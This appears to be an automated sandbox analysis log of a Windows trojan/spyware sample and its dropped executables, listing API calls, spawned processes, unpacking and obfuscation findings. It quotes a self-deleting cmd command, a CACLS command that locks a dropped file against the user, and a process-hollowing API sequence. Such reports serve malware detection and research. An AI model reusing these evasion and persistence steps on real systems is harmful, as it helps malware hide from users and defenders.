Source: Process Memory Space: 1EAA.exe PID: 5572, type: MEMORYSTR	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889

Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Code function: String function: 00404850 appears 458 times
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: String function: 00419D60 appears 137 times
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: String function: 0041AAF0 appears 182 times

Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_2_00401962 Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_2_0040196D Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_2_00401A0B NtTerminateProcess,
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_2_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_2_00402491 NtOpenKey,
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_1_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_1_00402491 NtOpenKey,
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 8_2_004E0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_2_00401962 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_2_0040196D Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_2_00401A0B NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_2_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_2_00402491 NtOpenKey,
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_1_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_1_00402491 NtOpenKey,

Source: 361B.exe.6.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 12F1.exe.6.dr	Static PE information: Section: ZLIB complexity 1.00011934878
Source: 305.exe.6.dr	Static PE information: Section: ZLIB complexity 1.00025390625
Source: 305.exe.6.dr	Static PE information: Section: ZLIB complexity 0.98994140625

Source: v72n86vFFq.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\hiftsuu

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@37/34@66/5

Source: C:\Users\user\AppData\Local\Temp\44A2.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\v72n86vFFq.exe

Source: v72n86vFFq.exe

Virustotal: Detection: 32%

Source: C:\Users\user\Desktop\v72n86vFFq.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\v72n86vFFq.exe "C:\Users\user\Desktop\v72n86vFFq.exe"
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Process created: C:\Users\user\Desktop\v72n86vFFq.exe "C:\Users\user\Desktop\v72n86vFFq.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\hiftsuu C:\Users\user\AppData\Roaming\hiftsuu
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\12F1.exe C:\Users\user\AppData\Local\Temp\12F1.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\1EAA.exe C:\Users\user\AppData\Local\Temp\1EAA.exe
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\hiftsuu	Process created: C:\Users\user\AppData\Roaming\hiftsuu C:\Users\user\AppData\Roaming\hiftsuu
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\361B.exe C:\Users\user\AppData\Local\Temp\361B.exe
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process created: C:\Users\user\AppData\Local\Temp\1EAA.exe C:\Users\user\AppData\Local\Temp\1EAA.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\44A2.exe C:\Users\user\AppData\Local\Temp\44A2.exe
Source: C:\Users\user\AppData\Local\Temp\361B.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6612 -s 520
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process created: C:\Users\user\AppData\Local\Temp\1EAA.exe C:\Users\user\AppData\Local\Temp\1EAA.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\51B3.exe C:\Users\user\AppData\Local\Temp\51B3.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\305.exe C:\Users\user\AppData\Local\Temp\305.exe
Source: C:\Users\user\AppData\Local\Temp\51B3.exe	Process created: C:\Users\user\AppData\Local\Temp\51B3.exe C:\Users\user\AppData\Local\Temp\51B3.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2340.exe C:\Users\user\AppData\Local\Temp\2340.exe
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\44A2.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process created: C:\Users\user\AppData\Local\Temp\2340.exe C:\Users\user\AppData\Local\Temp\2340.exe
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c echo Y\|CACLS "C:\Users\user\AppData\Local\Temp\6829558ede\tkools.exe" /P "user:N
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Process created: C:\Users\user\Desktop\v72n86vFFq.exe "C:\Users\user\Desktop\v72n86vFFq.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\12F1.exe C:\Users\user\AppData\Local\Temp\12F1.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\1EAA.exe C:\Users\user\AppData\Local\Temp\1EAA.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\361B.exe C:\Users\user\AppData\Local\Temp\361B.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\44A2.exe C:\Users\user\AppData\Local\Temp\44A2.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\51B3.exe C:\Users\user\AppData\Local\Temp\51B3.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\305.exe C:\Users\user\AppData\Local\Temp\305.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2340.exe C:\Users\user\AppData\Local\Temp\2340.exe
Source: C:\Users\user\AppData\Roaming\hiftsuu	Process created: C:\Users\user\AppData\Roaming\hiftsuu C:\Users\user\AppData\Roaming\hiftsuu
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process created: C:\Users\user\AppData\Local\Temp\1EAA.exe C:\Users\user\AppData\Local\Temp\1EAA.exe
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process created: C:\Users\user\AppData\Local\Temp\1EAA.exe C:\Users\user\AppData\Local\Temp\1EAA.exe
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\44A2.exe" & exit
Source: C:\Users\user\AppData\Local\Temp\51B3.exe	Process created: C:\Users\user\AppData\Local\Temp\51B3.exe C:\Users\user\AppData\Local\Temp\51B3.exe
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process created: C:\Users\user\AppData\Local\Temp\2340.exe C:\Users\user\AppData\Local\Temp\2340.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c echo Y\|CACLS "C:\Users\user\AppData\Local\Temp\6829558ede\tkools.exe" /P "user:N

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Source: C:\Users\user\AppData\Local\Temp\12F1.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\12F1.tmp

Jump to behavior

Source: sqlite3[1].dll.17.dr, sqlite3.dll.17.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: sqlite3[1].dll.17.dr, sqlite3.dll.17.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3[1].dll.17.dr, sqlite3.dll.17.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: sqlite3[1].dll.17.dr, sqlite3.dll.17.dr	Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: sqlite3[1].dll.17.dr, sqlite3.dll.17.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: sqlite3[1].dll.17.dr, sqlite3.dll.17.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: sqlite3[1].dll.17.dr, sqlite3.dll.17.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: sqlite3[1].dll.17.dr, sqlite3.dll.17.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: sqlite3[1].dll.17.dr, sqlite3.dll.17.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: sqlite3[1].dll.17.dr, sqlite3.dll.17.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: sqlite3[1].dll.17.dr, sqlite3.dll.17.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: sqlite3[1].dll.17.dr, sqlite3.dll.17.dr	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6612

Source: C:\Users\user\Desktop\v72n86vFFq.exe	Command line argument: lomubo
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Command line argument: mirel
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Command line argument: kexofec
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Command line argument: \H
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Command line argument: .dll
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Command line argument: zijiwe
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Command line argument: Yiwayimozeyawir
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Command line argument: mecevfgituxe
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Command line argument: Petocol
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Command line argument: Hanowopede
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Command line argument: WA

Source: 2340.exe.6.dr, u0086u0086u0086u0086u0086u0086u0086u008au0088u0086/u0086u0086u0086u0086u0086u0086u0086u008au0087u009e.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2340.exe.6.dr, u0086u0086u0086u0086u0086u0086u0086u008au0088u0086/u0086u0086u0086u0086u0086u0086u0086u008au0087u009e.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2340.exe.6.dr, u0086u0086u0086u0086u0086u0086u0086u008au0088u0086/u0086u0086u0086u0086u0086u0086u0086u008au0087u009e.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2340.exe.6.dr, u0086u0086u0086u0086u0086u0086u0086u008au0088u0086/u0086u0086u0086u0086u0086u0086u0086u008au0087u009e.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.12F1.exe.ce0000.0.unpack, l2vD8Fitdl8qSVEp19/mEqmoE9UxRmX9ogcto.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.12F1.exe.ce0000.0.unpack, l2vD8Fitdl8qSVEp19/mEqmoE9UxRmX9ogcto.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\361B.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: v72n86vFFq.exe

Static PE information: More than 200 imports for KERNEL32.dll

Source: v72n86vFFq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: v72n86vFFq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: v72n86vFFq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: v72n86vFFq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: v72n86vFFq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: v72n86vFFq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: v72n86vFFq.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: 2340.exe, 00000019.00000002.937037876.0000000003851000.00000004.00000001.sdmp, 2340.exe, 0000001F.00000000.915270893.0000000000400000.00000040.00000001.sdmp, 2340.exe, 0000001F.00000002.938653145.0000000000400000.00000040.00000001.sdmp, 2340.exe, 0000001F.00000000.899393554.0000000000400000.00000040.00000001.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.812857479.0000000002EF5000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.812716030.0000000002EF5000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.812563577.0000000004EFC000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb{1d source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.815694930.0000000002EEF000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.812703884.0000000002EEF000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: QC:\honohuredaseso\ditajexibu\45\rasuwolo-gelif.pdb source: 51B3.exe, 00000015.00000000.808085529.0000000000401000.00000020.00020000.sdmp, 51B3.exe, 00000015.00000002.840399491.0000000000401000.00000020.00020000.sdmp, 51B3.exe, 00000017.00000000.831520191.0000000000401000.00000020.00020000.sdmp, 51B3.exe.6.dr
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: C:\yacopicugux28_yero\lub.pdb source: 361B.exe, 0000000D.00000002.895424066.0000000000416000.00000002.00020000.sdmp, 361B.exe, 0000000D.00000000.792550514.0000000000416000.00000002.00020000.sdmp, WerFault.exe, 00000013.00000002.892891509.0000000005110000.00000002.00020000.sdmp, 361B.exe.6.dr
Source:	Binary string: wsspicli.pdbk source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: C:\yacopicugux28_yero\lub.pdb02`e@ source: 361B.exe, 0000000D.00000002.895424066.0000000000416000.00000002.00020000.sdmp, 361B.exe, 0000000D.00000000.792550514.0000000000416000.00000002.00020000.sdmp, WerFault.exe, 00000013.00000002.892891509.0000000005110000.00000002.00020000.sdmp, 361B.exe.6.dr
Source:	Binary string: r_C:\hacih_76\dozuzoso.pdb source: 44A2.exe, 00000011.00000000.800373192.0000000000401000.00000020.00020000.sdmp, 44A2.exe.6.dr
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.832216101.000000000515C000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: C:\hacih_76\dozuzoso.pdb source: 44A2.exe, 00000011.00000000.800373192.0000000000401000.00000020.00020000.sdmp, 44A2.exe.6.dr
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: C:\honohuredaseso\ditajexibu\45\rasuwolo-gelif.pdb source: 51B3.exe, 00000015.00000000.808085529.0000000000401000.00000020.00020000.sdmp, 51B3.exe, 00000015.00000002.840399491.0000000000401000.00000020.00020000.sdmp, 51B3.exe, 00000017.00000000.831520191.0000000000401000.00000020.00020000.sdmp, 51B3.exe.6.dr
Source:	Binary string: C:\repifuj_guwonip22\xenocuzoyipe\zijafohefejave.pdb source: v72n86vFFq.exe, hiftsuu.6.dr
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb}1b source: WerFault.exe, 00000013.00000003.832181512.0000000005156000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000013.00000003.812857479.0000000002EF5000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.812716030.0000000002EF5000.00000004.00000001.sdmp
Source:	Binary string: msimg32.pdb source: WerFault.exe, 00000013.00000003.832140102.0000000005150000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.832098618.0000000005181000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000013.00000003.815694930.0000000002EEF000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.812703884.0000000002EEF000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Local\Temp\44A2.exe

Unpacked PE file: 17.2.44A2.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Unpacked PE file: 9.2.12F1.exe.ce0000.0.unpack Unknown_Section0:ER;Unknown_Section1:W;.rsrc:R;Unknown_Section3:EW; vs Unknown_Section0:ER;Unknown_Section1:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Unpacked PE file: 17.2.44A2.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

.NET source code contains method to dynamically call methods (often used by packers)

Show sources

Source: 2340.exe.6.dr, u0086u0086u0086u0086u0086u0086u0086u008au0088u0086/u0086u0086u0086u0086u0086u0086u0086u008au0087u009e.cs	.Net Code: Type.GetTypeFromHandle(u0086u0086u0086u0086u0086u0086u0086u008au008cu009c.??????????(0x10000d2)).GetMethod("GetDelegateForFunctionPointer", new Type[] { Type.GetTypeFromHandle(u0086u0086u0086u0086u0086u0086u0086u008au008cu009c.??????????(0x1000017)), Type.GetTypeFromHandle(u0086u0086u0086u0086u0086u0086u0086u008au008cu009c.??????????(0x100001a)) })
Source: 9.2.12F1.exe.ce0000.0.unpack, l2vD8Fitdl8qSVEp19/mEqmoE9UxRmX9ogcto.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)

Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 0_2_007E9552 push esi; ret
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 0_2_007E95B7 push esi; ret
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_2_00401880 push esi; iretd
